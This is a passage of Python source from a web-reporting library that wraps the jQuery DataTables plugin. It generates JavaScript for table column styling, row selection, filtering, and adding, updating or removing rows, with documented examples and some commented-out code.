FACTORY = loadFactory() # atomic function to store all the different table mapping
self.columns = header.get('_order', list(recordSet._schema['keys']) + list(recordSet._schema['values']))
headers, colValues, self._jsRowFncs, self._jsColFncs, self._eventFrgs, self.tableStyle = [], [], [], {}, {}, []
for i, column in enumerate(self.columns):
if column in recordSet._schema['values']:
colValues.append(i)
recordSet._data[column].fillna(0, inplace=True)
# TODO: replace this replacement by moving to list of lists
colDef = {'data': column.replace(".", "\\.").replace("[", "\\[").replace("]", "\\]"), 'title': column, 'format': 'float', 'digits': self.tableOptions.get("digits", 0)}
else:
colDef = {'data': column.replace(".", "\\."), 'title': column}
if column in header and isinstance(header[column], dict):
colDef.update(header[column])
headers.append(colDef)
if tableTypes == 'hierarchy':
pyDetailCls = self.addPyCss('CssTdDetails')
pyShownDetailCls = self.addPyCss('CssTdDetailsShown')
headers[0]['visible'] = False
headers[1]['visible'] = False
headers = [{'data': None, 'title': '', 'width': 20, "className": pyDetailCls, 'orderable': False, 'defaultContent': ''}] + headers
self.aresObj.jsOnLoadFnc.add('''
$('#%(htmlId)s table').on('click', 'td.%(pyDetailCls)s, td.%(pyShownDetailCls)s', function () {
var tr = $(this).closest('tr'); var row = %(jsTableId)s.row(tr);
if (row.child.isShown()) {
$(this).removeClass('%(pyShownDetailCls)s').addClass('%(pyDetailCls)s');
row.child.hide(); tr.removeClass('shown')}
else {
$(this).removeClass('%(pyDetailCls)s').addClass('%(pyShownDetailCls)s');
row.child( "<div>gbgbg</div>" ).show(); tr.addClass('shown');
}})''' % {'pyDetailCls': pyDetailCls, 'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'pyShownDetailCls': pyShownDetailCls})
self.__table = FACTORY['base'](aresObj, headers, recordSet, self.jsTableId)
self.__table.data.attach(self)
if len(colValues) > 0:
tableStyles = tableOptions.get('style', {})
valsDef = tableStyles.get('values', {}).get('attr', {})
valsDef['table'] = headers
self.styleCols(colValues, tableOptions.get('style', {}).get('values', {'name': 'number'}).get('name', 'number'), attr=valsDef)
for systemCell, flag in self._systemOptions.items():
if flag:
valsDef = tableStyles.get(systemCell, {}).get('attr', {})
valsDef['table'] = headers
self.styleCols(colValues, tableOptions.get('style', {}).get(systemCell, {'name': systemCell}).get('name', systemCell), attr=valsDef)
# else: # Add the different export possible from a table
# self.addAttr('lengthMenu', [ [ 10, 25, 50, -1 ], [ '10 rows', '25 rows', '50 rows', 'Show all' ] ])
# self.__table['buttons'].append('"pageLength"')
#self.__table.footerType = footerType
self.addAttr(tableOptions)
self.addGlobalVar("DATATABLES_STATE", "{}")
if tableOptions.get('rowsGroup', False):
self.aresObj.jsImports.add('datatables-rows-group')
      self.addAttr('rowsGroup', tableOptions['rowsGroup'])
if tableOptions.get('rowGroup', False):
self.aresObj.jsImports.add('datatables-row-group')
self.aresObj.cssImport.add('datatables-row-group')
self.addAttr('rowGroup', tableOptions['rowGroup'])
if tableOptions.get('fixedHeader', False):
self.aresObj.jsImports.add('datatables-fixed-header')
self.aresObj.cssImport.add('datatables-fixed-header')
#self.addAttr('headerOffset', 50, 'fixedHeader')
if tableOptions.get('colsOrdering', False):
self.aresObj.cssImport.add('datatables-col-order')
self.aresObj.jsImports.add('datatables-col-order')
self.addAttr('colReorder', True)
if tableOptions.get('fixedLeftColumnId', None) is not None:
self.aresObj.jsImports.add('datatables-fixed-columns')
self.aresObj.cssImport.add('datatables-fixed-columns')
self.addAttr('leftColumns', tableOptions['fixedLeftColumnId'], 'fixedColumns')
self.aresObj.cssObj.add('CssTableColumnFixed')
for i in range(tableOptions['fixedLeftColumnId']):
self.__table.header[i]['className'] = 'py_CssTableColumnFixed'.lower()
# Add the different export possible from a table
#self.addAttr('dom', 'Bfrtip') # (B)utton (f)iltering
self.aresObj.cssObj.add('CssDivHidden')
#for button, name in [('copyHtml5', 'copy'), ('csvHtml5', 'csv'), ('excelHtml5', 'excel'), ('pdfHtml5', 'pdf')]:
# self.addButton( {'extend': button, 'text': '', 'className': 'py_cssdivhidden', 'title': '%s_%s' % (name, self.htmlId)} )
self.aresObj.cssObj.add('CssDivTextLeft')
self.title = title
self.css({'margin-top': '5px'})
# if saveRow is not None:
# self.addColSave(saveRow)
#
# if deleteCol:
# self.addColDelete(deleteCol)
# --------------------------------------------------------------------------------------------------------------
#
# CSS / JS WRAPPER DEFINITION
# --------------------------------------------------------------------------------------------------------------
def styleCols(self, colIds, values, attr=None):
"""
:category: Table Column Style
:rubric: CSS
:type: Display
:dsc:
    Change the style of the defined list of column indices. If all the columns are selected the keyword _all can be
    used. This can be useful to change some rows in the datatable.
:example: tb.styleCols(0, 'css', attr={'css': {'color': 'dark-green', 'background-color': 'yellow'}})
:example: tb.styleCols('_all', 'css_id', attr={'cssCell': {'border-top': '5px solid pink', 'border-bottom': '5px solid pink'}, 'id': 2})
"""
self._cols.add(colIds, values, attr)
def styleColsByNames(self, colNames, values, attr=None):
"""
:category: Table Column Style
:rubric: CSS
:type: Display
:dsc:
    Change the style of the defined list of column names. Those names should exist among the column names of the input
    dataframe. The keyword _all cannot be used here.
:example: tb.styleColsByNames(['Series4'], 'class', attr={'class': css[0].classname})
"""
if not isinstance(colNames, list):
colNames = [colNames]
colIds = [self.columns.index(colName) for colName in colNames]
self._cols.add(colIds, values, attr)
def cssRows(self, cssCls=None, rowIds=None, data=None, colName=None, cssOvrs=None):
"""
:category: Table Rows Formatting
:rubric: JS
:type: Configuration
:dsc:
This Python wrapper will implement the following javascript function, createdRow: function(row, data, dataIndex ) {}
:example: tableObj.cssRows({'color': 'red', 'background': 'green'}, data='Increasing', colName='direction')
:example: tableObj.cssRows(['CssTablePinkBorder', 'CssTableRedCells'])
:example: tableObj.cssRows(['CssTableTotal'], rowIds=[2])
:return: The Python table object
:link Datatable Documentation: https://datatables.net/reference/option/createdRow
"""
cssAttr, cssClsName = {}, []
if isinstance(cssCls, list):
for css in cssCls:
cssMod = self.aresObj.cssObj.get(css)
if cssMod is not None:
self.addPyCss(css)
cssClsName.append(cssMod().classname)
elif isinstance(cssCls, dict):
cssAttr = cssCls
else:
cssMod = self.aresObj.cssObj.get(cssCls)
if cssMod is not None:
self.addPyCss(cssCls)
cssClsName.append(cssMod().classname)
if cssOvrs is not None:
cssAttr.update(cssOvrs)
jsFncs = []
if len(cssClsName) > 0:
jsFncs.append("$(row).addClass('%s')" % " ".join(cssClsName))
if len(cssAttr) > 0:
jsFncs.append("$(row).css(%s)" % json.dumps(cssAttr))
if rowIds is not None:
# In this case if has to be controlled by the column renderer
#self.cssCols(cssCls, rowIds=rowIds)
return self
if data is not None:
if colName is None:
raise Exception("cssRows Error - You should supply a column name (colName) to use this function")
self._jsRowFncs.append("if(data['%(colName)s'] == %(data)s) {%(jsFnc)s}" % {"data": json.dumps(data), "jsFnc": ";".join(jsFncs), "colName": colName})
if rowIds is None and data is None and colName is None:
self._jsRowFncs.append("$(row).css(%(jsFnc)s)" % {"jsFnc": ";".join(jsFncs)})
return self
def cssSelection(self, pyCssCls="CssTableSelected"):
"""
:category: Table Style
:rubric: CSS
:type: Display
:example: >>> tableObj.cssSelection( aresObj.cssCls("CssBespoke", {"color": "red"} ) )
:return: Returns a CSS String with the name of the CSS class to be used as reference
:dsc:
Change the selection CSS class to be used in the different cell and row event.
This can be an existing class in the framework or a bespoke one created on the fly
"""
import inspect
if inspect.isclass(pyCssCls):
self.aresObj.cssObj.addPy(pyCssCls)
pyCssCls = [pyCssCls.__name__]
if isinstance(pyCssCls, str):
pyCss = self.addPyCss(pyCssCls)
else:
for attr in pyCssCls.style:
attr["value"] = "%s!important" % attr["value"] if not attr["value"].endswith("!important") else attr["value"]
self.aresObj.cssObj.cssStyles.update(pyCssCls.getStyles())
pyCss = pyCssCls.classname
return pyCss
# --------------------------------------------------------------------------------------------------------------
#
# SYSTEM SECTION
# --------------------------------------------------------------------------------------------------------------
@property
def val(self):
"""
:category: Javascript features
:rubric: JS
:example: tableObj.val
:return: Javascript string with the function to get the content of the component
:dsc:
Property to get the jquery value of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
"""
return "%s.data().toArray()" % self.jsTableId
@property
def contextVal(self):
"""
:category: Javascript Event
:rubric: JS
:example: tableObj.contextVal
:return: Javascript String with the value attached to the context menu
:dsc:
Set the javascript data defined when the context menu is created from a table object
"""
return "{val: $(event.target).html(), row: event.target._DT_CellIndex.row, column: event.target._DT_CellIndex.column}"
@property
def json(self):
"""
:category: Javascript features
:rubric: JS
:example: myObj.json
:returns: Javascript string with the function to get the content of the component
:dsc:
Property to get the jquery value as a String of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
This will return the table content but also the selected line, if any
"""
return "JSON.stringify({data: %(jsTableId)s.data().toArray(), selection: %(jsClickState)s })" % {"jsTableId": self.jsTableId, 'jsClickState': self.jsClickState() }
def filter(self, jsId, colName, allSelected=True, filterGrp=None):
"""
:category: Data Transformation
:rubric: JS
:type: Filter
:dsc:
Link the data to the filtering function. The records will be filtered based on the component value
:return: The Python Html Object
"""
self.aresObj.jsOnLoadFnc.add("%(breadCrumVar)s['params']['%(htmlCode)s'] = ''" % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
val = "%(breadCrumVar)s['params']['%(htmlCode)s'] " % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar}
if allSelected:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {'allIfEmpty': []})[colName] = val
self.aresObj.jsSources.setdefault(jsId, {})['filters']['allIfEmpty'].append(colName)
else:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {})[colName] = val
return self
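# Usage sketch (names illustrative): filter the registered data source 'my_src'
# on the 'Country' column using this table's htmlCode value; with allSelected
# an empty value keeps every record.
#   tableObj.filter('my_src', 'Country', allSelected=True)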
def onDocumentLoadVar(self): pass
def onDocumentLoadFnc(self): pass
def onDocumentReady(self):
self.aresObj.jsOnLoadFnc.add('''
%(jsGenerate)s; $('#%(htmlId)s table').find('th').tooltip(); %(extraJsInitFnc)s ;
''' % {'jsGenerate': self.jsGenerate(None), 'htmlId': self.htmlId, 'extraJsInitFnc': ';'.join(self.extraJsInitFnc)})
def jsGenerate(self, jsData='data', jsDataKey=None, isPyData=False, jsParse=False):
"""
:return:
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
if jsParse:
jsData = "JSON.parse(%s)" % jsData
if not hasattr(self, 'ctx'):
self.addAttr('columns', self.__table.header)
self.addAttr('createdRow', "function(row, data, dataIndex) {%s}" % ";".join(self._jsRowFncs), isPyData=False)
columnOrders = [col['data'] for col in self.__table.header]
self.addAttr('aoColumnDefs', self._cols.toJs(), isPyData=False)
self.ctx = self.__table.js()
return '''
var table_data = {%(options)s};
if(typeof %(jsTableId)s === 'undefined'){
table_data.data = %(jsData)s;
%(jsTableId)s = $('#%(htmlId)s table').DataTable(table_data)}
else {
%(jsClear)s; %(jsTableId)s.rows.add(%(jsData)s); %(jsDraw)s;
} ''' % {'jsClear': self.jsClear(), 'jsTableId': self.jsTableId, 'jsDraw': self.jsDraw(), 'htmlId': self.htmlId,
'options': ", ".join(self.ctx), 'jsData': self.__table.data.setId(jsData).getJs()}
def ordering(self, orders):
"""
:category: Javascript - Datatable Table ordering
:rubric: JS
:example: myTable.ordering( [('col1', 'desc'), ('col2', 'asc')] )
:example: tableObj.ordering(False)
:dsc:
Order the table according to the content of some defined columns.
Default behaviour will use the first column (visible or hidden) to order the table
:link Datatable Documentation: https://datatables.net/examples/basic_init/table_sorting.html
:return: self
"""
self.__table.ordering(orders)
return self
def selectRow(self, colName, jsValue, pyCssCls='CssTableSelected', isPyData=True):
"""
:category: Javascript - Datatable
:rubric: JS
:example: >>> myTable.selectRow( 'col1', 'test') ;
:dsc:
Function to set the selection of some rows in the table.
The selection can be done on the javascript side but also at initialisation on the Python side
:link Datatable Documentation:
"""
pyCss = self.cssSelection(pyCssCls)
if isPyData:
jsValue = json.dumps(jsValue)
self.__table.formatRow('''
if ( data['%(colName)s'] == %(value)s) {
$( row ).addClass( '%(pyCss)s' );
if ( DATATABLES_STATE['#%(htmlId)s'] == undefined ) { DATATABLES_STATE['#%(htmlId)s'] = [] } ;
DATATABLES_STATE['#%(htmlId)s'].push( {'row': JSON.stringify(data), row_id: index } );
} ''' % {"value": jsValue, 'colName': colName, 'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'pyCss': pyCss} )
def addButton(self, data):
"""
:category: Javascript - Datatable Initialisation
:rubric: JS
:example: >>> myTable.addButton( {'copy': 'Copy to clipboard'} )
:dsc:
Display the generic buttons on the top of the table.
:link Datatable Documentation: https://datatables.net/extensions/buttons/
:link Datatable Documentation 2: https://datatables.net/reference/option/buttons.buttons.text
"""
self.__table['buttons'].append({})
for key, val in data.items():
self.__table.addAttr(key, val, ('buttons', -1))
# -----------------------------------------------------------------------------------------
# Generic Python function to the attribute tables
# -----------------------------------------------------------------------------------------
def addAttr(self, key, val=None, category=None, isPyData=True):
"""
:category: Table Definition
:rubric: PY
:type: Configuration
:dsc:
Add parameters to the Datatable definition before building it.
:link Datatable Documentation: https://datatables.net/manual/styling/
:return: Python Object
"""
if isinstance(key, dict):
for k, v in key.items():
self.__table.addAttr(k, v, category, isPyData)
else:
self.__table.addAttr(key, val, category, isPyData)
return self
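# A few common DataTable options passed through addAttr (a sketch; the option
# names come from the DataTables documentation, not from this module):
#   tableObj.addAttr('pageLength', 25)
#   tableObj.addAttr({'paging': True, 'ordering': False})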
def delAttr(self, key, category=None):
"""
:category: Table Definition
:rubric: PY
:type: Configuration
:dsc:
Remove a parameter from the Datatable definition before building it.
:link Datatable Documentation: https://datatables.net/manual/styling/
:return: Python Object
"""
self.__table.delAttr(key, category)
return self
# -----------------------------------------------------------------------------------------
# STANDARD DATATABLE JAVASCRIPT
# -----------------------------------------------------------------------------------------
def jsDataRow(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Python - Datatable Data conversion
:rubric: PY
:example: >>> myTable.jsDataRow()
:example: >>> myTable.jsFilterCol('Product', jsData=t.jsDataRow(), jsDataKey='Product')
:dsc:
This function will change the data object used in the event to be the row directly as a dictionary.
:tip: You can use this in jsData to replace the data in the function like jsFilterCol
:return: Returns a string as a javascript dictionary with the row data as a dictionary
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return "JSON.parse(%s.row)" % jsData
def jsFilterCol(self, colName, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Javascript - Datatable Filter
:rubric: JS
:example: >>> myTable.jsFilterCol('Product', jsData=t.jsDataRow(), jsDataKey='Product')
:TODO: Extend this method to filter on multiple columns
:dsc:
Filtering function on the datatable based on external rules. This will use the internal Datatable engine to filter the data
:tip: Use the function to replace the jsData to be the row using jsDataRow() to filter on another table click row event
:return: Return a string corresponding to the filtering function on the table
:link Datatable Documentation: https://datatables.net/reference/api/search()
"""
for i, col in enumerate(self.__table.header):
if col['data'] == colName:
colIndex = i
break
else:
return ''
if isPyData:
jsData = json.dumps(jsData)
else:
if jsDataKey is not None:
jsData = "%s['%s']" % (jsData, jsDataKey)
self.addAttr('searching', True)
return '''%(jsTableId)s.column( [%(colIndex)s] ).search( %(jsData)s ).draw();''' % {'jsTableId': self.jsTableId, 'colIndex': colIndex, 'jsData': jsData}
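# Usage sketch (hedged): wire a select component to this filter; `sel` and its
# event payload key are assumptions based on the input classes later in this file.
#   sel.change(tableObj.jsFilterCol('Product', jsData='data', jsDataKey='event_val'))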
def jsFilterFromCell(self):
"""
:category: Javascript - Datatable Filter
:rubric: JS
:example: >>> myTable.jsFilterFromCell()
:TODO: Extend this method to filter on multiple columns
:dsc:
Filtering function on the datatable based on an external cell object. This will use the internal Datatable engine to filter the data
:return: Return a string corresponding to the filtering function on the table
:link Datatable Documentation: https://datatables.net/reference/api/search()
"""
self.addAttr('searching', True)
return '''%(jsTableId)s.columns().search('').draw();%(jsTableId)s.column( [data.col_id] ).search( data.cell ).draw(); ''' % {'jsTableId': self.jsTableId}
def jsClear(self, update=False):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: myTable.jsClear()
:dsc:
Function to clear the content of a table. The table will still be present but only with the headers.
It will then be possible to add rows to this table as long as the expected keys are present in the dictionary
:link Datatable website: https://datatables.net/reference/api/clear()
"""
updateFnc = self.jsDraw() if update else ""
return "%(jsTableId)s.clear();%(jsDraw)s" % {'jsTableId': self.jsTableId, "jsDraw": updateFnc}
def jsDraw(self, scope=None):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsDraw() ;
:dsc:
Function on the javascript side to force a table to be refreshed. This can be triggered in a javascript event
or after a change but on the javascript side
:link Datatable website: https://datatables.net/reference/api/draw()
"""
if scope is None:
return "%(jsTableId)s.draw()" % {'jsTableId': self.jsTableId}
return "%(jsTableId)s.draw(%(scope)s)" % {'jsTableId': self.jsTableId, 'scope': json.dumps(scope)}
def jsRemoveRow(self, jsData="$(this).parents('tr')", jsDataKey=None, update=True, isPyData=False):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsRemoveRow() ;
:example: >>> click(myTable.jsRemoveRow(1)) ;
:dsc:
Function to remove the selected row. This function should be triggered only in a row click event as the this (self)
object is used.
:link Datatable website: https://datatables.net/reference/api/row()
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
updateFnc = self.jsDraw('page') if update else ""
return "var row = %(jsTableId)s.row(%(rowIdx)s); var rowNode = row.node(); row.remove();%(jsDraw)s" % {"rowIdx": jsData, 'jsTableId': self.jsTableId, "jsDraw": updateFnc}
def jsUpdateCell(self, jsData='data', jsDataKey='cell', isPyData=False, update=True):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:example: >>> myTable.jsUpdateCell() ;
:example: >>> myTable.jsUpdateCell( jsData= {'cell': ["A", "B"], 'col_id': 1, 'row_id': 1 }, isPyData=True) ;
:dsc:
Function to update the value of a cell. Can be the current one or another.
This information should be defined in the jsDataKey object.
:link Datatable website: https://datatables.net/reference/api/cell()
"""
if isPyData:
jsData = json.dumps(jsData)
updateFnc = self.jsDraw('page') if update else ""
return "%(jsTableId)s.cell( %(jsData)s['row_id'], %(jsData)s['col_id'] ).data(%(jsData)s['%(cell)s']);%(jsDraw)s" % {'jsTableId': self.jsTableId, 'jsData': jsData, 'cell': jsDataKey, "jsDraw": updateFnc}
def jsCellGoTo(self, url=None, jsData='data', jsDataKey='cell', jsCellCode='cell', isPyData=False):
"""
:category: Javascript function
:rubric: JS
:type: Cell event
:example: >>> myObj.jsCellGoTo( 'http://www.google.fr' )
:dsc:
The href property sets or returns the entire URL of the current page.
:return: A string representing the Javascript fragment to be added to the page to go to another web page
:link W3C Documentation: https://www.w3schools.com/jsref/prop_loc_href.asp
"""
if isPyData:
jsData = json.dumps(jsData)
if url is None:
return "%s;location.href=buildBreadCrum();" % self.jsAddUrlParam(jsCellCode, "%s.%s" %(jsData, jsDataKey), isPyData=False)
return 'window.location.href="%s?%s=" + %s;' % (url, jsCellCode, "%s.%s" %(jsData, jsDataKey))
def jsUpdateRow(self, jsData='data', jsDataKey='row', isPyData=False, update=True):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:example: >>> myTable.jsUpdateRow() ;
:example: >>> myTable.jsUpdateCell( jsData= {'row': ["A", "B"], 'row_id': 1 }, isPyData=True) ;
:dsc:
Function to update a row in a table. This can work very well with a clickRow event as the object will already have the
expected format. So by returning this kind of data from an ajax call and then calling this function, the source row will be updated
:link Datatable website: https://datatables.net/reference/api/row()
"""
if isPyData:
jsData = json.dumps(jsData)
updateFnc = self.jsDraw('page') if update else ""
return "%(jsTableId)s.row( %(jsData)s['row_id']).data( %(jsData)s['%(jsDataKey)s']);%(jsDraw)s" % {'jsTableId': self.jsTableId, 'jsData': jsData, 'jsDataKey': jsDataKey, "jsDraw": updateFnc}
def jsAddRow(self, jsData='data', uniqKey=None, jsDataKey=None, pyCssCls='CssTableNewRow', isPyData=False):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsAddRow()
:example: >>> .click(myTable.jsAddRow([{'direction': 'test', 'dn': -11}], isPyData=True))
:example: >>> myTable.jsAddRow( [{}], isPyData=True )
:dsc:
Function to add a row to a table. This will use the internal Javascript data object generated automatically from the event.
Even a service call will return a data object as a dictionary. The jsDataKey is the key in the data dictionary where the
relevant row information is stored.
:link Datatable website: https://datatables.net/reference/api/row()
"""
if pyCssCls == 'CssTableNewRow':
# Add the class to the Python factory and create the reference to it
pyCssCls = self.addPyCss(pyCssCls)
if isPyData:
jsData = json.dumps(jsData)
return '''
var uniqKeys = %(uniqKey)s ; var rows = %(rows)s; var keys = {} ;
if (%(jsDataKey)s != null) { rows = rows[%(jsDataKey)s] ;};
if (uniqKeys != null) {
rows.forEach( function(rec) {
var newKey = [] ; uniqKeys.forEach( function(code) { newKey.push( rec[code] ) ; }) ;
keys[ newKey.join('#') ] = true ; }) ;
var rowToBeDeleted = -1;
%(jsTableId)s.rows().every( function ( rowIdx, tableLoop, rowLoop ) {
var data = this.data();
var newKey = [] ; uniqKeys.forEach( function(code) { newKey.push( data[code] ) ; }) ;
if ( newKey in keys) { rowToBeDeleted = rowIdx; } } );
if (rowToBeDeleted != -1) { %(jsTableId)s.row( rowToBeDeleted ).remove().draw() } ; }
%(jsTableId)s.rows.add( rows ).draw().nodes().to$().addClass( '%(pyCssCls)s' ); %(extraJsInitFnc)s;
if (typeof data != 'undefined') { data.uniqKeys = uniqKeys; data.row = JSON.stringify(%(rows)s) ; };
''' % {'jsTableId': self.jsTableId, 'uniqKey': json.dumps(uniqKey), 'rows': jsData, 'pyCssCls': pyCssCls,
'jsDataKey': json.dumps(jsDataKey), 'extraJsInitFnc': ";".join(self.extraJsInitFnc)}
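# Usage sketch (button object and column names are illustrative): add a default
# row on click and de-duplicate on the 'id' column.
#   addBtn.click(myTable.jsAddRow([{'id': 'NEW', 'value': 0}], uniqKey=['id'], isPyData=True))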
#
# def jsLoadFromSrc(self, jsDataKey=None):
# return '''
# $('#%(htmlId)s_loading_icon').show() ; $('#%(htmlId)s').hide(); $('#%(htmlId)s_loading').show();
# %(ajax)s ;
# ''' % {"ajax": self.aresObj.jsPost(self.dataSrc['script'], jsData=self.dataSrc.get('htmlObjs'), htmlCodes=self.dataSrc.get('htmlCodes'),
# jsFnc=["$('#%(htmlId)s').show(); $('#%(htmlId)s_loading').hide(); $('#%(htmlId)s_loading_icon').hide() ; " % {"htmlId": self.htmlId},
# self.jsLoad('data', jsDataKey=jsDataKey), self.jsLastUpdate()] ),
# 'htmlId': self.htmlId}
def jsSetRowSelected(self, colNames, jsValue='data.row', jsDataKey=None, isPyData=False, pyCssCls='CssTableSelected'):
"""
:category: Javascript - Datatable Selections
:rubric: JS
:type: Table Event
:example: >>> click(tb.jsSetRowSelected(['direction'], {'direction': 'Increasing'}, isPyData=True))
:example: >>> button.click(t3.jsSetRowSelected(["C"], {"C": 1}, isPyData=True))
:dsc:
Force the row selection based on a list of value per columns in the table.
this event should be defined in a Javascript event but as usual parameters can be both Javascript and Python.
:tip: You can get hold of the selected row at any point of time in the Javascript by using jsClickState() in a js Event
:return: The javascript fragment to select the matching rows and unselect the rest
"""
pyCss = self.cssSelection(pyCssCls)
if isPyData:
jsValue = json.dumps(jsValue)
if jsValue == 'data.row':
jsValue = "JSON.parse(%s)" % jsValue
if jsDataKey is not None:
# Here we do not consider the default value of the jsValue as this is coming from jsDataKey
jsValue = "data['%s']" % jsDataKey
return '''
if (DATATABLES_STATE['#%(htmlId)s'] != undefined) {
DATATABLES_STATE['#%(htmlId)s'].forEach( function(rec) {$(%(jsTableId)s.row(rec.row_id).node()).removeClass('%(pyCss)s')})} ;
DATATABLES_STATE['#%(htmlId)s'] = [] ;
%(jsTableId)s.rows().every( function (rowIdx, tableLoop, rowLoop) {
var dataRow = this.data(); var isSelected = true;
%(colName)s.forEach( function(col) {if (dataRow[col] != %(jsValue)s[col] ) {isSelected = false}});
if (isSelected) {
$( %(jsTableId)s.row(rowIdx).node() ).addClass( '%(pyCss)s' );
DATATABLES_STATE['#%(htmlId)s'].push( {row: JSON.stringify(%(jsTableId)s.rows( $(this) ).data()[0]), row_id: %(jsTableId)s.row( $(this) ).index() } )
}})''' % {'jsTableId': self.jsTableId, 'colName': json.dumps(colNames), 'jsValue': jsValue, 'htmlId': self.htmlId, 'pyCss': pyCss}
def jsDestroy(self):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsDestroy() ;
:dsc:
Function to fully destroy the table definition. Once this function is triggered there is no definition at all of this object and the
datatable needs to be fully redefined (with the column headers, the styles...)
:return: The javascript string fragment to destroy the table
:link Datatable Documentation: https://datatables.net/reference/api/destroy()
"""
return "%s.destroy()" % self.jsTableId
def jsGetData(self):
"""
:category: Javascript - Datatable Data Retrieval
:rubric: JS
:example: >>> myTable.jsGetData() ;
:dsc:
Function to get the datatable data in a table
:return: The javascript string fragment to get the table content as an Array
"""
return 'GetTableData(%s)' % self.jsTableId
def jsGetSize(self):
"""
:category: Javascript function
:rubric: JS
:type: Table Event
:example: >>> myTable.jsGetSize() ;
:dsc:
Function to get the number of rows in the javascript side
:return: The Javascript string function to get the number of rows as an integer
"""
return '%s.rows().data().length' % self.jsTableId
def jsGetRow(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Javascript function
:rubric: JS
:type: Table Event
:example: >>> myTable.jsGetRow( 1, isPyData=True ) ;
:dsc:
Function to get the row in the datatable from the row ID
:return: The Javascript string function to get the row as a javascript Array
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '%s.rows().data()[%s]' % (self.jsTableId, jsData)
def jsGetCol(self, jsData='data', jsDataKey=None, removeDuplicate=True, isPyData=False):
"""
:category: Javascript function
:rubric: JS
:type: Table Event
:example: >>> click(aresObj.jsConsole(tb.jsGetCol('direction', isPyData=True)))
:dsc:
Function to get the column in the datatable from the column name.
This will return a list with the distinct values or the full column.
By default distinct values are removed
:return: The Javascript string function to get the column as a javascript Array
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return ''' function(){
var columnName = %(jsData)s; var columnNames = [];
%(jsTableId)s.settings().context[0].aoColumns.forEach(function(col){columnNames.push(col.data)});
return %(jsTableId)s.column(columnNames.indexOf(columnName)).data().toArray()%(uniqueVals)s}()
''' % {'jsData': jsData, 'jsTableId': self.jsTableId, 'uniqueVals': '.unique()' if removeDuplicate else ''}
# -----------------------------------------------------------------------------------------
# ADD SYSTEM EVENT COLUMNS
# -----------------------------------------------------------------------------------------
# def addEventCol(self, icon, jsEvent, eventName=None, tooltip=''):
# if isinstance(jsEvent, list):
# jsEvent = ";".join(jsEvent)
# pyCssCls = self.addPyCss('CssTableColumnSystem')
# colReference = icon.replace(" ", "").replace("-", '') if eventName is None else eventName
# self.__table.header.append({'data': colReference, 'className': '%s %s' % (pyCssCls, colReference), 'title': '<div class=\'%s\'></div>' % icon, 'width': '5px',
# 'dsc': tooltip, 'format': '"<div name=\'%s\' title=\'%s\' style=\'cursor:pointer\' class=\'%s\'></div>"' % (self.htmlId, tooltip, icon)})
# self.aresObj.jsOnLoadFnc.add('''
# $(document).on('click', '.%(colReference)s', function() {
# var jsTableId = window[$(this).find('div').attr('name') + '_table'];
# var data = {row: JSON.stringify(jsTableId.rows( $(this) ).data()[0]), row_id: jsTableId.row( $(this) ).index(), event: '%(colReference)s' } ;
# %(jsPost)s}) ''' % {"colReference": colReference, 'jsPost': jsEvent, 'pyCssCls': pyCssCls })
# return self
#
# def addColDelete(self, deleteCol):
# pyCssCls = self.addPyCss('CssTableColumnSystem')
# self.__table.header.append({'data': '_delete', 'className': '%s delete_%s' % (pyCssCls, self.htmlId), 'title': '<div class=\'far fa-trash-alt\'></div>', 'width': '5px',
# 'format': '"<div id=\'delete\' name=\'%s\' title=\'Delete Row\' style=\'cursor:pointer\' class=\'far fa-trash-alt\'></div>"' % self.htmlId})
#
# jsPost = self.aresObj.jsPost(deleteCol['url'], None, deleteCol.get('success', ''), htmlCodes=deleteCol.get('htmlCodes')) if isinstance(deleteCol, dict) else ''
# self.aresObj.jsOnLoadFnc.add('''
# $( document ).on('click', '.delete_%(htmlId)s', function() {
# if ($(this).find('div').attr('id') == 'delete') {
# var jsTableId = window[$(this).find('div').attr('name') + '_table'];
# var data = {row: JSON.stringify(jsTableId.rows( $(this) ).data()[0]), row_id: jsTableId.row( $(this) ).index(), event: 'delete' } ;
# jsTableId.row( $(this).parents() ).remove().draw('page');
# %(jsPost)s } }) ''' % {"deleteCls": pyCssCls, 'jsPost': jsPost, 'htmlId': self.htmlId})
# return self
#
# def addColSave(self, saveRow):
# self.addGlobalVar("%s_changed" % self.jsTableId, "true")
# pyCssCls = self.addPyCss('CssTableColumnSystem')
# self.__table.header.append({'data': '_save', 'className': '%s save_%s' % (pyCssCls, self.htmlId), 'title': '<div class=\'fas fa-check\'></div>', 'width': '5px',
# 'dsc': 'Click on the icon to save the row',
# 'format': '"<div id=\'save\' name=\'%s\' title=\'Save Row\' style=\'cursor:pointer;display:none\' class=\'fas fa-check\'></div>"' % self.htmlId})
#
